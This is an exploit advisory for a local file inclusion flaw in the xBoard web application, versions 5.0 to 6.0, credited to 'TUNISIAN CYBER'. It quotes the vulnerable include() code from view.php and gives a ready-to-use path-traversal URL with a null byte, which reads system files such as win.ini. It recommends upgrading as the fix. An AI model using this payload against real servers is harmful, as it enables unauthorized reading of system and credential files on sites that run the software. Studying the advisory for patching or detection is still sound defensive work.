Home / exploits xBoard 5.0 / 5.5 / 6.0 Local File Inclusion
Posted on 26 December 2013
X-------------------------------------------------------------X _____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________ |_ _| | | | | |_ _/ ___|_ _|/ _ | | | / __ / / ___ ___| ___ | | | | | | | | | | `--. | | / /_ | | | | / / V /| |_/ / |__ | |_/ / | | | | | | . ` | | | `--. | | | _ || . ` | | | / | ___ __|| / | | | |_| | | |_| |_/\__/ /_| |_| | | || | | | \__/ | | | |_/ / |___| | \_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_| X-------------------------------------------------------------X [+] Author: TUNISIAN CYBER [+] Exploit Title: xBoard 5.0/5.5/6.0 Local File Inclusion [+] Date: 24-12-2013 [+] Category: WebApp [+] Vendor:http://sourceforge.net/projects/xboard/ [+] Google Dork: [+] Tested on: Win7 , ubuntu 13.04 ######################################################################################## I/Vulnerable code: view.php v5.0: 49: if (file_exists("$directory/$post.html")) 50: { 51: include("$directory/$post.html"); v5.5: 28: if (file_exists("$directory/$post.html")) 29: { 30: include("$directory/$post.html"); v6.0: 27: if (file_exists("$directory/$post.html")) 28: { 29: include("$directory/$post.html"); II/Exploit and p.0.c: http://{host}/xboard/view.php?post=../../../../../../../../../../windows/win.ini%00 p.0.c: http://oi44.tinypic.com/2uxyaz9.jpg III/Solution: Upgrade to v6.5 ./3nD ######################################################################################## Greets to: XMaXtn, N43il HacK3r, XtechSEt
